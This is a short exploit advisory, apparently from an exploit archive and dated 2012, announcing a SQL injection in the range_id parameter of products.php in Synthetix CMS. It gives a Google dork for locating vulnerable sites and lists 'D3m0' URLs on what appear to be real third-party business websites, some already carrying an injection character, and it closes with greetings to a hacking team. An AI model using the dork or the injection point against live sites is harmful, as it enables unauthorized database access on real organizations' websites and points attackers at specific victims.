############################################################################ # Exploit Title: Synthetix CMS (products.php) SQL Injection Vulnerability # Google Dork: "Website design & hosting by Synthetix" # Date: 9/7/2012 # Author: Ajax Security Team # Discovered By: Crim3R # Home: WwW.AjaxTm.CoM # Vendor Software: http://www.synthetix.com/ # Version: All Version # Category:: webapps # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ ================================== [+] range_id= parametr in products.php is Vulnerable to sqli D3m0: http://www.marineroutboards.co.uk/products.php?range_id=1'§ion_id=NULL http://www.yanmarengines.co.uk/products.php?range_id=4'§ion_id=5 http://www.mercurymarine.co.uk/products.php?range_id=1 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369